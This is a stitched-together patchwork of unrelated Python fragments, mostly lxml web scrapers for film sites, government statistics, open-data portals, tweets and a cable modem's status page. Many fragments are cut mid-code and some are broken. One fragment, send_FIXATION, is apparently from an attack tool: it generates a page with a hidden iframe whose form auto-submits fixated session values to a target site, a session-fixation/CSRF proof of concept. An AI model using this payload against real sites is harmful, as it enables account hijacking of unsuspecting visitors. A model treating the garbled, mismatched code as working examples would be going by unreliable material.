in class_in_db: class_in_db[clazz].students.remove(user) for clazz in default_classes: if user not in clazz.students.all(): member_of.append(clazz.code) clazz.students.add(user) classess = [] for c in Class.objects.filter(students__username=login, semester__year=year, semester__winter=is_winter, subject_id=subject.id): classess.append(f"{c.timeslot} {c.teacher.username}") yield { 'login': login, 'firstname': firstname, 'lastname': lastname, 'created': created, 'classes': classess, }
def test_torrent_rows(self): request = urlopen(str(self.torrents.url)) document = html.parse(request) rows = self.torrents._get_torrent_rows(document.getroot()) self.assertEqual(len(rows), 30)
text = element.text_content().strip() if (element.tag == 'br') and skip_state == 1: if element.tail is not None: text = element.tail.strip() if text != '': full_text.append(text) return { 'title': '%s_%s_%s' % (category, collect, title), 'text': full_text } url = 'http://www.zwbk.org/MyLemmaShow.aspx?lid=76385' connect = urlopen(url) content = connect.read() page = html.parse(StringIO(content.decode('utf-8'))) table = page.xpath('//table/tr/td[2]/div/div[7]') collect_list = [] for links in table[0].find_class('classic'): title = links.text_content().split(u'·') if len(title) > 3: page_url = links.attrib.get('href') collect_list.append({ 'category': title[1], 'collect': title[2], 'title': title[3], 'page_url': page_url }) result = map(lambda x: get_fulltext(**x), collect_list)
fpi = "https://www.fpi.nsdl.co.in/web/Reports/Latest.aspx" header = { 'Accept': '*/*', 'Accept-Language': 'en-US,en;q=0.5', 'Host': 'nseindia.com', 'Referer': 'https://nseindia.com/live_market/dynaContent/live_watch/live_index_watch.htm', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1;WOW64;rv:28.0) Gecko Firefox/45', 'X-Requested-With': 'XMLHttpRequest' } req = urllib2.Request(fpi, headers=header) page = urllib2.urlopen(req) parsed = parse(page) soup = BeautifulSoup(page) page.status_code == 200 doc = parsed.getroot() tables = doc.findall('.//table') table = parse_options_data(tables[0]) xfc = requests.get(fpi, headers=header) xfc.status_code == 200 xpage = urllib2.urlopen(xfc.content) xparse = parse(xfc.content) xtsf = soup(xfc.content) tsd = table_to_2d(xtsf) xtsf.find_all("row")
# -*- coding: UTF-8 -*- import lxml.html as html from lxml.etree import Element, SubElement, ElementTree from lxml import etree tag=[] url_list=[] an_news_list=[] newsTags_list = [] news_title_list = [] for i in range(1,10): root = html.parse('http://www.kinopoisk.ru/news/perpage/200/page/{0}/'.format(i)).getroot() tag.extend(root.find_class('item')) for i in tag: for j in i.iterlinks(): if j[2] == '/name/7418/' or 'id_actor=7418' in j[2]: for y in i.find_class('title').pop().iterlinks(): if 'news' in y[2]: url_list.append('http://www.kinopoisk.ru'+y[2]) an_news_list.append(i.find_class('descr').pop().text_content()) for ind, url in enumerate(url_list): page1 = html.parse(url) root1 = page1.getroot() tag1 = root1.find_class('newsHeaderTitle').pop() news_title = tag1.text_content().strip() news_title_list.append(news_title) tag2 = root1.find_class('newsTags').pop() newsTags = tag2.text_content().split() for i in range(len(newsTags)-1): if u'премьер' in newsTags[i]: newsTags[i] = newsTags[i] + " " + newsTags.pop(i+1)
# -*- coding: utf-8 -*- import lxml.html as html tag=[] url_list=[] title_list=[] for i in range(1,493): root = html.parse('http://kinogo.co/page/{0}/'.format(i)).getroot() tag.extend(root.find_class('shortstory')) for i in tag: for j in i.iterlinks(): if 'indijskie_filmy' in j[2]: for y in i.find_class('zagolovki').pop().iterlinks(): if '2010' in y[2]: url_list.append(y[2]) title_list.append(i.find_class('zagolovki').pop().text_content()) for i in range(len(url_list)): print url_list[i] print title_list[i]
csvr = csv.reader(f) csvw = csv.writer(fo) url_tpl = 'http://www.expansion.com/mercados/bolsa/dividendos/{suffix}' p = re.compile('(\d*\.?\d+,\d+)') got_to_sps = False for r in csvr: if r[0] == 'SPS': got_to_sps = True if not got_to_sps: continue url = url_tpl.format(suffix=r[1]) print('processing %s' % url) try: page = urlopen(url) except HTTPError: continue root = html.parse(page) ttrr = root.findall('.//div[@id="dividendos_doble_izquierda"]//tr') if ttrr and len(ttrr) > 1: for tr in ttrr[1:]: ttdd = tr.findall('.//td') d = ttdd[0].text.replace('.', '-') net = p.match(ttdd[2].text).group(0).replace('.', '').replace(',', '.') try: gross = p.match(ttdd[1].text).group(0).replace('.', '').replace(',', '.') except AttributeError: # shit happens gross = float(net) * 1.3333 csvw.writerow([r[0], d, gross, net, ttdd[3].text, ttdd[4].text]) f.close() fo.close()
def get_categorie_content(category_link): # Get the page allrecords = [] parser = etree.HTMLParser(encoding='utf-8') data = etree.parse(rooturl + category_link, parser) # Get the category category = data.xpath('/html/body/div/div[5]/div/div[1]//h1/text()')[0].strip() # category = urllib.unquote(category).decode('utf8') if (verbose): print 'Category: ' + ascii_only(category) datasets = get_datasets(data) numdatasets = len(datasets) if (verbose): print 'There are ' + str(numdatasets) + ' datasets' # Now get the html for each one. This is painful. # The bit of html concerning the datasets: corehtml = data.xpath('//div[@id=\'ContentBlock\']')[0] # First try to split by the horizontal rules. This usually works, but not always datasetparts = etree.tostring(corehtml).split('<hr id="hr') if (verbose): print 'Found ' + str(len(datasetparts)) + ' datasets by splitting by hr elements with ids' if len(datasetparts) != numdatasets: if (verbose): print 'This doesn\'t match. Trying with links to TOC' # If there is TOC, this works. There isn\'t always one. datasetparts = etree.tostring(corehtml).split('nach oben') del datasetparts[len(datasetparts) - 1] for index in range(0, len(datasetparts)): datasetparts[index] = datasetparts[index] + '</a>' if (verbose): print 'Found ' + str(len(datasetparts)) + ' datasets by splitting by links to TOC' if len(datasetparts) != numdatasets: if (verbose): print 'Well, that didn\'t work either. Giving up' print 'Exciting because of a serious error - turn on verbose in the code to find out what dataset is causing the problem' exit() else: if numdatasets > 1: for index in range(1, len(datasetparts)): # That split makes for bad HTML. Make it better. datasetparts[index] = '<hr id="hr' + datasetparts[index] count = 1 for datasetpart in datasetparts: data = etree.HTML(datasetpart) record = {} record['city'] = 'bochum' record['categories'] = [] record['categories'].append(category) datasets = get_datasets(data) record['title'] = datasets[0] if (verbose): print 'Parsing dataset ' + ascii_only(record['title']) if 'noch im Aufbau' in record['title']: # Nothing to see here if (verbose): print 'Empty category' continue record['url'] = rooturl + category_link + '#par' + str(count) count += 1 datatables, filetables = findfilesanddata(data) if len(datatables) == 0: if (verbose): print 'This record contains no data... checking for link to another page...' checkforsubpage = data.xpath('//span//a') for link in checkforsubpage: if (verbose): print etree.tostring(link) if len(link.xpath('text()')) > 0 and u'zu den Daten' in link.xpath('text()')[0]: testurl = link.xpath('@href')[0] if (verbose): print 'Following/updating URL: ' + rooturl + testurl record['url'] = rooturl + testurl datatables, filetables = findfilesanddata(html.parse(rooturl + testurl)) # get the data on the files, and get each link in it record['filelist'] = [] for table in filetables: record['filelist'].extend([(rooturl + x) for x in etree.HTML(table).xpath('//a/@href')]) record['formats'] = set() record['spatial'] = False for file in record['filelist']: formatarray = file.split('/')[-1].split('.') format = 'Unknown' if len(formatarray)>1: format = formatarray[1].upper().split('?')[0] elif 'WMS' in formatarray[0]: format = 'WMS' elif 'WFS' in formatarray[0]: format = 'WFS' record['formats'].add(format) if (format.upper() in metautils.geoformats): record['spatial'] = True record['formats'] = list(record['formats']) if len(datatables) > 1: if (verbose): print 'ERROR: More than one data table' print 'Exciting because of a serious error - turn on verbose in the code to find out what dataset is causing the problem' exit() elif len(datatables) == 0: if (verbose): print 'ERROR: No data table' print 'Exciting because of a serious error - turn on verbose in the code to find out what dataset is causing the problem' exit() # parse the data table by row if (verbose): print 'Reading datatable...' rowelements = etree.HTML(datatables[0]).xpath('//tr') for row in rowelements: if len(row.xpath('td[1]/text()')) == 0: continue key = row.xpath('td[1]/text()')[0] if (verbose): print ascii_only(key) if len(row.xpath('td[2]/text()')) != 0: val = row.xpath('td[2]/text()')[0] elif len(row.xpath('td[2]//a')) != 0: val = row.xpath('td[2]//a/text()')[0] else: if (verbose): print 'ERROR: Missing value' print 'Exciting because of a serious error - turn on verbose in the code to find out what dataset is causing the problem' exit() if (verbose): print ascii_only('Parsing key ' + key.replace(':', '') + ' with value ' + val) if u'veröffentlicht' in key: record['publisher'] = val elif u'geändert' in key: record['temporalextent'] = val.split(' ')[2] elif u'Lizenz' in key: record['licenseshort'] = metautils.long_license_to_short(val) record['open'] = metautils.isopen(record['licenseshort']) elif u'Webseite' in key: record['website'] = row.xpath('td[2]//a/@href')[0] # keep, as 'original' metadata if 'http://' not in record['website']: record['website'] = rooturl + record['website'] elif u'Kontakt' in key: record['contact'] = rooturl + row.xpath('td[2]//a/@href')[0] allrecords.append(record) return allrecords
search_tags = [tag.strip() for tag in search_tags.split(",")] search_tags = [tag for tag in search_tags if not (tag == "" or "*" in tag)] info = { "item_id": item_id, "title": title, "subtitle": subtitle, "description_parts": description_parts, "item_pools": item_pools, "item_types": item_types, "search_tags": search_tags } return info platinumgod_content = html.parse('http://platinumgod.co.uk') print("Extracting image information") item_containers = platinumgod_content.xpath( '//div[contains(@class, "items-container")]') item_infos = {} for item_container in item_containers: items = item_container.xpath('.//li[contains(@class, "textbox")]') bar = progressbar.ProgressBar() for item in bar(items): item_info = extract_item_info(item) item_infos[item_info["item_id"]] = item_info print("Extracting trinket information") trinket_containers = platinumgod_content.xpath( '//div[contains(@class, "trinkets-container")]')
if len(sys.argv) < 2: print "Usage" sys.exit(1) genre = sys.argv[1] datadir = 'mc-data/' + genre csvfile = open(os.path.join(datadir, genre + '.csv'), 'w') writer = csv.writer(csvfile) writer.writerow(['Artist', 'Album', 'Score']) for page in sorted(os.listdir(datadir)): if page.endswith('html'): print 'parsing page ' + page page_file = open(os.path.join(datadir, page), 'r') doc = html.parse(page_file).getroot() try: for li in doc.cssselect('li.release_product'): album = li.cssselect( 'div.product_title')[0].text_content().strip() score = li.cssselect( 'span.metascore')[0].text_content().strip() artist = li.cssselect('li.product_artist')[0].cssselect( 'span.data')[0].text_content().strip() print 'artist: %s, album: %s, score: %s' % (artist, album, score) writer.writerow([artist, album, score]) except Exception as e: print e
def parsePages(): # get the pagetitle path = r'/Users/carolm/Desktop/lingrad' for dirpath, subdirs, files in os.walk(path): for x in files: if fnmatch.fnmatch(x, '*.html'): item = os.path.join(dirpath, x) doc = parse(item).getroot() print doc.text_content() cleaner = Cleaner( style=True, links=False, ) cleaned = cleaner.clean_html(doc) titles = cleaned.find_class('Pagetitle') if titles: # snag the page title - method returns list. . there's really only one title = titles[0].text_content() else: try: titlesel = cleaned.xpath('//p[@class="Subhead"]') title = titlesel[0].text_content() except: pass # get the description descrips = cleaned.find_class('Summarytext') if descrips: descrip = descrips[0].text_content() else: descrip = "no description" #get the body if cleaned.find_class('Summarytext'): bodies = cleaned.xpath( '//p[@class="Summarytext"]/following-sibling::p') elif cleaned.find_class('Subhead'): bodies = cleaned.xpath( '//p[@class="Subhead"]//following-sibling::p') else: bodies = cleaned.xpath('*//p') html = "".join([ lxml.html.tostring(body, method='xml') for body in bodies ]) html = html.replace('\n', ' ').replace('\r', ' ') html = html.replace(' ', ' ').replace(' ', ' ') html = html.replace('
', ' ').replace('
', ' ') html = html.replace('•', '').replace(' ', '') html = html.replace(' ', '') html = html.replace('class="msoNormal"', '').replace('###', '') html = html.replace('<span> </span>', '') # html = re.sub(r'<p.*?[.*?Body text:.*?].*?</p>', r'', html) html = re.sub(r'<p class="Bullettext">(.*?)</p>', r'<li>\1</li>', html) html = re.sub(r'<p class="Subhead1">(.*?)</p>', r'<h3>\1</h3>', html) newbody = html #Need to have temporary id id = str(random.randint(0, 99999999)) target.invokeFactory("Document", id) obj = target[id] obj.setTitle(title) obj.setDescription(descrip) obj.setText(newbody) # Will finish Archetypes content item creation process, # rename-after-creation and such obj.processForm() transaction.savepoint(optimistic=True) # Need to perform manual normalization for id, # as we don't have title available during the creation time normalizer = getUtility(IIDNormalizer) new_id = normalizer.normalize(obj.Title()) if new_id in target.objectIds(): raise RuntimeError("Item already exists:" + new_id + " in " + target.absolute_url()) obj.aq_parent.manage_renameObject(id, new_id) transaction.commit() obj.reindexObject()
def send_FIXATION(self, tokens, tokenvals, targetval, destination, postvars, postvals, fixvars, fixvals, idsrc): """ EXPERIMENTAL: This is the fixation handler. It needs a lot of work and is very simple at the moment. It's currently Experimental and just used to demonstrate a PoC of this type of attack """ # Yes, I realize a lot of this is duplicated from the previous payload. It's just because I don't know # what the hell is going to happen with it. # Give the value to the meta refresh metadest = "0;" + destination # Make the request for the idsrc request = urllib2.Request(idsrc) opener = urllib2.build_opener() # Add a useragent to the request, Yeah, I know. This should be user definable. Maybe later. request.add_header( 'User-Agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11' ) response = opener.open(request).read() root = html.parse(StringIO(response)) ########################### # ToDo: Currently only looks for name = value situations. Needs to # possibly look for others too such as id ########################### # Grab the data values for fixation for index, value in enumerate(fixvars): for node in root.iter(): if node.get('name') == value: fixvals[index] = node.get('value') # Append the fixated values in to the POST variables and values for value in fixvars: postvars.append(value) for value in fixvals: postvals.append(value) header = '<meta http-equiv="refresh" content="%s" />' % metadest page2 = open("page2.html", "wb") innerpage = markup.page() innerpage.init() formsubmit = "javascript:document.myform.submit()" formname = "myform" formaction = "post" inputtype = "hidden" innerpage.body(onload=formsubmit) innerpage.form(name=formname, action=targetval, method=formaction) for index, val in enumerate(postvars): innerpage.input(name=val, type=inputtype, value=postvals[index]) innerpage.form.close() page2.write(str(innerpage)) page2.close() # Create primary page page = markup.page() page.init(header=header) # This is a hack for Markup.py so it will properly close the iframe tag ifrmtext = "this" ifrmsrc = "page2.html" page.iframe(ifrmtext, height="1", width="1", src=ifrmsrc) # page.form(formvals, name=formname, method=attacktype, action=targetval) # print(page) self.wfile.write(page)
import smtplib import main from os.path import basename #from pandas import DataFrame from time import gmtime, strftime addresses, email_list = main.ReadConfig("main.ini", "mosclinic") main_domain_stat = addresses[0].split("/")[2] print main_domain_stat today = strftime("%d.%m.%Y %H:%M", gmtime()) a = [] b = [] table_data = [] for page_link in addresses: page = html.parse(page_link) #for el in page.getroot().find_class('noline'): for el in page.getroot().find_class('margin15 font_arial12 as_a2'): link = el.values()[2] if "medreview" in link: page1 = html.parse('%s' % (link)) content = page1.getroot().find_class( 'margin15 font_arial12')[0].text_content() #imgs = page1.getroot().findall(".//img[@style]") dates = page1.getroot().findall(".//meta[@itemprop]") for date in dates: if date.items()[0][0] == "itemprop" and date.items( )[0][1] == "datePublished": time = date.items()[1][1] content_link = content + "<br>" + link
def on_data(self, data): global f global filecnt global tweetcnt global chkFlag #Checking if the file count has reached 50 (i.e 5GB) if (filecnt >= 50): print "filecnt" chkFlag = False return False #Checks the number of tweets if tweetcnt >= numTweets and numTweets != 0: print "first" chkFlag = False return False #Create a new text file every 100MB if (f.tell() >= 104857600): print "last" f.close() chkFlag = True filecnt += 1 file_output_path = dirName + "/tweets_data{0}.txt".format(filecnt) f = open(file_output_path, 'a') decoded = json.loads(data) #Get Hastags hashTags = decoded['entities']['hashtags'] if (hashTags != "[]"): for htags in hashTags: hashTags = unicode(htags['text']).encode("ascii", "ignore") #Get tweet tweet = unicode(decoded['text']).encode("ascii", "ignore").replace( '\n', ' ').replace('\t', '').replace('\r', '') #Get Co-ordinates coord = unicode(decoded['coordinates']).encode("ascii", "ignore") #Get tweet time tweetTime = unicode(decoded['created_at']) #Get retweet count retweetCount = unicode(decoded['retweet_count']).encode( "ascii", "ignore") #Get reply count replyCount = unicode(decoded['reply_count']).encode("ascii", "ignore") #Get favorite count favoriteCount = unicode(decoded['favorite_count']).encode( "ascii", "ignore") #Get URLs urls = unicode(decoded['entities']['urls']).encode("ascii", "ignore") #Get title pageTitle = None expanded_url = None if urls != "[]": expanded_url = unicode( decoded['entities']['urls'][0]['expanded_url']).encode( "ascii", "ignore") try: page = urllib2.urlopen(expanded_url) p = parse(page) pageT = p.find(".//title") if (pageT != None): pageTitle = unicode(p.find(".//title").text).encode( "ascii", "ignore") except urllib2.HTTPError, err: if err.code == 404: print "Page not found!" elif err.code == 403: print "Access denied!" else: print "Error:", err.code except urllib2.URLError, err: print "URL error:", err.reason
def convert(self, fn=None, dirn=None): global sample_name, lab, fl def extract_file_data(lns, dlm): chapters = re.split(dlm + "{3,}", lns) for chapter in chapters: chapter = chapter.strip() div = etree.SubElement(doc, 'block') paragraphs = re.split(delim + "{1,2}", chapter) for i in range(len(paragraphs)): pgph = etree.SubElement(div, 'block') pgph.text = paragraphs[i] if fn is None: print('Type in filename') fn = input() fl = fn sample_name = '' lab = 'lab1' else: fl = Path(dirn) / fn sample_name = ''.join( filter(bool, re.split(r'/|\w(?!\w*/$)', dirn))) + '/' lab = re.match(r'\w+(?=/)', dirn).group(0) route = re.split(r'/', fn) xml_fn = '.xml'.join(re.split(r'\.\w+$', route[len(route) - 1])) doc = etree.Element('doc') doc.attrib['name'] = xml_fn if re.search(r'\.txt$', fn): f = open(fl, encoding='utf8') lines = ''.join(f.readlines()) delim = r'\n' extract_file_data(lines, delim) elif re.search(r'\.html$', fn): file = codecs.open(fl, 'r') file_content = file.read() parser = html.HTMLParser() html_tree = html.parse(io.StringIO(file_content), parser) for b in html_tree.xpath('//div[p]'): block = etree.SubElement(doc, 'block') for idx, p in enumerate(html_tree.xpath('//div/p')): paragraph = etree.SubElement(block, 'block') p_child_text = '' for el in html_tree.xpath('//div/p[' + str(idx + 1) + ']/*'): p_inner = etree.SubElement(paragraph, 'block') p_inner.text = escape(el.text_content()) p_child_text = ''.join(p_child_text.split(el.text_content())) \ if p_child_text \ else ''.join(p.text_content().split(el.text_content())) paragraph.text = escape(''.join( re.split(r'\n{2,}| +\n', p_child_text))) elif re.search(r'\.docx$', fn): file = docx.Document(fl) lines = [] for p in file.paragraphs: lines.append(p.text) lines = '\n'.join(lines) delim = r'\n' extract_file_data(lines, delim) elif re.search(r'\.pdf$', fn): rsc_mngr = PDFResourceManager() fh = io.StringIO() converter = TextConverter(rsc_mngr, fh) pg_interp = PDFPageInterpreter(rsc_mngr, converter) fp = open(fl, 'rb') for pg in PDFPage.get_pages(fp, caching=True, check_extractable=True): pg_interp.process_page(pg) lines = ''.join(re.split(r'\n{2,}|\x0c', fh.getvalue())) converter.close() fh.close() delim = ' ' extract_file_data(lines, delim) else: print('Incorrect filename extension!') tree = etree.ElementTree(doc) tree.write("%s/xml_samples/%s%s" % (lab, sample_name, xml_fn), pretty_print=True, xml_declaration=True, encoding='UTF-8') return '%s/xml_samples/%s%s' % (lab, sample_name, xml_fn)
def get_listings(): page = 1 totalPages = 1 shows = [] while page <= totalPages: response = urlopen(DATA_URL % str(page)) data = json.loads(response.read().decode()) totalPages = data["totalPages"] for product in data["data"]: show = {} show["title"] = product["name"] show["image"] = product["imageUrl"] show["type"] = "movie" print(show["title"], product["prodUrl"]) # get price from data url try: doc = lh.parse(urlopen(product["prodUrl"])) prices = doc.xpath(".//span[contains(@class, 'price')]") if len(prices) > 0: price = prices[0].text.strip()[1:] print(price) show["episodes"] = [{ "show": product["name"], "uri": product["prodUrl"], "s": 0, "e": 0, "price": price }] shows.append(show) except: pass page = page + 1 page = 1 totalPages = 1 while page <= totalPages: response = urlopen(DATA_URL_TV % str(page)) data = json.loads(response.read().decode()) totalPages = data["totalPages"] for product in data["data"]: show = {} id = product["id"] series = 0 title = re.sub(r' (Series|Season) \d+[a-zA-Z]?\b', '', product["name"].strip()) matches = re.search(r"\d+[a-zA-Z]?\b", product["name"].strip()) if matches: series = matches.group(0) episodes = get_episodes(id, series, product["prodUrl"]) for x in shows: # merge seasons if x["title"] == title: x["episodes"] = x["episodes"] + episodes break else: # new show show = {} show["title"] = title show["type"] = "tv" show["episodes"] = episodes show["image"] = product["imageUrl"] shows.append(show) page = page + 1 return shows
download DHS Yearbook tables of Immigration Statistics 2015 """ from lxml import html from urllib import request import numpy as np import pandas as pd if __name__ == "__main__": captions = set() writer = pd.ExcelWriter('dhs.xlsx', engine="xlsxwriter") for table_num in range(1, 42): url = "https://www.dhs.gov/immigration-statistics/"\ "yearbook/2015/table{0}".format(table_num) tree = html.parse(request.urlopen(url)) _path = '//*[@id="content-area"]/div/div/article/div[1]/div[2]/div/div/table' tables = tree.xpath(_path) """ Some tables contains data by continents and by countries. The data by countries will override the one for continents in the following for loop """ for table in tables: data = [row.text_content().strip().split("\n") for row in table.xpath('//tr')] cap = table.xpath('//caption')[0].text_content() df = pd.DataFrame(data=data[1:]) if df.shape[1] == len(data[0]): df.columns=data[0] df.replace('-', np.nan, inplace=True) df.to_excel(writer, sheet_name="Table{}".format(table_num), index=False)
movie_comment_xpath = "//ol/li[{}]/div/div/div/p/span/text()" movie_ratting_xpath = "//ol/li[{}]/div/div/div/div/span[@class='rating_num']/text()" movie_name_Chineses = [] movie_name_Englishs = [] movie_comments = [] movie_rattings = [] movie_directors = [] movie_actors = [] movie_ages = [] movie_countrys = [] movie_categorys = [] #2. 开始爬取网页内容 while next_pages: dom = html.parse(urlopen(next_pages)) movies = dom.xpath(movie_xpath) for i in range(len(movies)): movie_name_Chinese = dom.xpath(movie_name_Chinese_xpath.format(i + 1)) movie_name_English = dom.xpath( movie_name_English_xpath.format(i + 1)) # 去掉斜线空格 movie_info = dom.xpath(movie_info_xpath.format(i + 1)) movie_comment = dom.xpath(movie_comment_xpath.format(i + 1)) movie_ratting = dom.xpath(movie_ratting_xpath.format(i + 1)) movie_info_detail = regular_expression(movie_info) director = movie_info_detail[0] list_append(director, movie_directors) actor = movie_info_detail[1] list_append(actor, movie_actors)
a8 = [] a9 = [] a10 = [] a21 = [] a22 = [] a23 = [] a24 = [] a25 = [] a26 = [] a27 = [] a28 = [] bar = Bar('Processing', max=part) for i in range(s, s + part): br = mec.Browser() page = br.open(sitelinks[i]) tree = html.parse(page) get1 = tree.xpath('/html/body/div[2]/div[3]/div[3]/div[1]/dl/dd[1]/text()') get2 = tree.xpath('/html/body/div[2]/div[3]/div[3]/div[1]/dl/dd[2]/text()') get3 = tree.xpath('/html/body/div[2]/div[3]/div[3]/div[1]/dl/dd[3]/text()') get4 = tree.xpath('/html/body/div[2]/div[3]/div[3]/div[1]/dl/dd[4]/text()') get5 = tree.xpath('/html/body/div[2]/div[3]/div[3]/div[1]/dl/dd[5]/text()') get6 = tree.xpath('/html/body/div[2]/div[3]/div[3]/div[1]/dl/dd[6]/text()') get7 = tree.xpath('/html/body/div[2]/div[3]/div[3]/div[1]/dl/dd[7]/text()') get8 = tree.xpath('/html/body/div[2]/div[3]/div[3]/div[1]/dl/dd[8]/text()') get9 = tree.xpath('/html/body/div[2]/div[3]/div[3]/div[1]/dl/dd[9]/text()') get10 = tree.xpath('/html/body/div[2]/div[3]/div[3]/div[1]/dl/dd[10]/text()') try: get21 = tree.xpath('/html/body/div[2]/div[3]/div[2]/div[1]//tr/td[1]/text()')[0] get22 = tree.xpath('/html/body/div[2]/div[3]/div[2]/div[1]//tr/td[1]/text()')[1] get23 = tree.xpath('/html/body/div[2]/div[3]/div[2]/div[1]//tr/td[1]/text()')[2] get24 = tree.xpath('/html/body/div[2]/div[3]/div[2]/div[1]//tr/td[1]/text()')[3]
import scraperwiki from itertools import count from lxml import html BASE = "http://www.openpr.de/news/%s" initial = scraperwiki.sqlite.get_var('num', 1) for i in count(initial): url = BASE % i try: doc = html.parse(url) pm = doc.find('//div[@id="pm"]') pm_str = html.tostring(pm) scraperwiki.sqlite.save(["id"], {'id': i, 'pm': pm_str, 'url': url}) print "AYE", i except: print "FAIL", i scraperwiki.sqlite.save_var('num', i)import scraperwiki from itertools import count from lxml import html BASE = "http://www.openpr.de/news/%s" initial = scraperwiki.sqlite.get_var('num', 1) for i in count(initial): url = BASE % i try:
url = data_url % (street, house) print url doc = html.parse(url) data = {'strnr': street, 'hausnr': house} for row in doc.findall('//table[@class="hnrresult"]//tr'): name, value = row.findall('./td') name = str(name.text_content().encode('ascii', 'ignore')) name = name.replace(':', '_').replace('.', '-').replace(' ', '_') value = value.xpath('string()').strip() data[name] = value print data #scraperwiki.sqlite.save(unique_keys=["strnr", "hausnr"], # data=data) doc = html.parse(base_url) for option in doc.findall('//select[@name="otnr"]/option'): sdoc = html.parse(streets_url % option.get('value')) for street in sdoc.findall('//input[@name="strnr"]'): hdoc = html.parse(houses_url % street.get('value')) for house in hdoc.findall('//input[@name="hausnr"]'): print house.items() print dir(house) #get_data(street.get('value'), house.get('value')) import scraperwiki from lxml import html base_url = "http://fbinter.stadt-berlin.de/rbs/rbs-lookup.jsp" #streets_url = "http://fbinter.stadt-berlin.de/rbs/rbs-lookup.jsp?beznr=&otnr=%s" #streets_url = "http://fbinter.stadt-berlin.de/rbs/rbs-slct-str.jsp?beznr=&otnr=%s&strnr=&strname=&hausnr=&go=&mapLabel=&targetUrl="
def getsurf(): if debugParse: try: tree = html.parse('Status.html') except Exception as e: eprint(e) return os.EX_IOERR else: # Wait for network to come up from system sleep if sleepsec > 0: time.sleep(sleepsec) # Try to bring up network device with ping. if pings > 0: try: ping = subprocess.run([ "ping", "-o", "-q", "-i", str(pingwait), "-c", str(pings), "-n", ip ], stdin=subprocess.DEVNULL, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) if ping.returncode != 0: eprint("warning: {} returned {}".format( ' '.join(ping.args), ping.returncode)) except Exception as e: eprint(e) # read surfboard admin password from file on working directory try: with open('surfboard_password.txt', 'r') as pwdfile: passwd = pwdfile.readline().strip() except Exception as e: eprint(e) return os.EX_IOERR login_url = 'http://' + ip + '/cgi-bin/adv_pwd_cgi' status_url = 'http://' + ip + '/cgi-bin/status' logout_url = 'http://' + ip + '/cgi-bin/status#' ar_nonce = '{:08d}'.format(random.randint(0, 99999999)) payload = { 'username': '******', 'password': passwd, 'ar_nonce': ar_nonce } try: with requests.Session() as s: p = s.post(login_url, data=payload, timeout=30) # print(p.text) if p.status_code != requests.codes.ok: eprint("{}, code={}".format(login_url, p.status_code)) # An authorised request. r = s.get(status_url, timeout=30) if r.status_code != requests.codes.ok: eprint("{}, code={}".format(status_url, r.status_code)) tree = html.fromstring(r.text) lo = s.get(logout_url, timeout=30) if lo.status_code != requests.codes.ok: eprint("{}, code={}".format(logout_url, lo.status_code)) if tree is None: eprint("{}, no content, code={}".format( status_url, r.status_code)) return os.EX_IOERR except Exception as e: eprint(e) return os.EX_IOERR try: timeel = tree.xpath('//*[text()=\'Current System Time:\']') if not timeel or len(timeel) < 1: eprint("Time not found") return os.EX_IOERR if timeel[0].tag != 'p': timeel = timeel[0].xpath('./ancestor::p') if not timeel or len(timeel) < 1: eprint("Time not found") return os.EX_IOERR timestr = timeel[0].text_content().encode("UTF-8").decode() timestr = timestr.split(':', 1) if not timestr or len(timestr) != 2: eprint("time={}, not parseable".format(timestr)) return os.EX_IOERR timestr = timestr[1].strip() try: timeval = datetime.datetime.strptime(timestr, '%a %b %d %H:%M:%S %Y') except ValueError as e: eprint("time={}, not parseable: {}".format(timestr, e)) return os.EX_IOERR tbls = tree.xpath('//table') for tbl in tbls: # look for Downstream Bonded Channels table if tbl.xpath( './/*[contains(text(),"Downstream Bonded Channels")]'): rows = tbl.getchildren() for row in rows: # first row has only the "Downstream ..." th # second row has "Channel" header tds = row.xpath('./td') if len(tds) == 0 or tds[0].text_content() == "Channel": continue vals = [ col.text_content().encode('UTF-8').decode().strip() for col in tds ] if len(vals) < 7: eprint("Only {} values in table row".format(len(vals))) continue vals[4] = vals[4].replace('MHz', '').strip() vals[5] = vals[5].replace('dBmV', '').strip() vals[6] = vals[6].replace('dB', '').strip() vals = [val.replace('----', '') for val in vals] print("{0},{1}".format(timeval, ','.join(vals))) except etree.XPathEvalError as e: eprint('xpath exception={}'.format(e)) return os.EX_IOERR return os.EX_OK
import re # Matplotlib module import matplotlib.pyplot as plt # general urllib2 config user_agent = 'Mozilla/5.0 (compatible; MSIE 5.5; Windows NT)' headers = {'User-Agent': user_agent} url = "http://it.wikipedia.org/wiki/Demografia_d'Italia" # prepare the request and open the url req = urllib2.Request(url, headers=headers) response = urllib2.urlopen(req) # we parse the webpage, getroot() return the document root doc = parse(response).getroot() # find the data table, using css elements table = doc.cssselect('table.wikitable')[0] # prepare data structures, will contain actual data years = [] people = [] # iterate over the rows of the table, except first and last ones for row in table.cssselect('tr')[1:-1]: # get the row cell (we will use only the first two) data = row.cssselect('td') # the first cell is the year tmp_years = data[0].text_content()
import lxml.html as html tag=[] url_list=[] title_list=[] for i in range(1,137): root = html.parse('http://gidonline.club/genre/melodrama/page/{0}/'.format(i)).getroot() tag.extend(root.find_class('mainlink')) for i in tag: try: y = i.find_class('mqn').pop().text_content() if y == '2010': for y in i.find_class('mainlink').pop().iterlinks(): if y[1] == 'href': url_list.append(y[2]) title_list.append(i.text_content().split('\n')[0]) except IndexError: y = i.find_class('mqx').pop().text_content() for i in range(len(url_list)): print "Title: ", title_list[i] print "URL: ", url_list[i], '\n'
import requests from lxml.html import parse from io import StringIO # 검색할 이미지의 키워드 입력 keyword = input("검색할 이미지를 입력하세요 : ") url = 'https://www.google.co.kr/search?q=' + keyword + '&source=lnms&tbm=isch&sa=X&ved=0ahUKEwic-taB9IXVAhWDHpQKHXOjC14Q_AUIBigB&biw=1842&bih=990' # html 소스 가져오기 text = requests.get(url).text # html 문서로 파싱 text_source = StringIO(text) parsed = parse(text_source) # root node doc = parsed.getroot() # img 경로는 img 태그안에 src에 있음(20개만 크롤링 됨.. 이유 찾아봐야 됨) imgs = doc.findall('.//img') img_list = [] # 이미지 경로가 담길 list for a in imgs: img_list.append(a.get('src')) print(a.get('src'))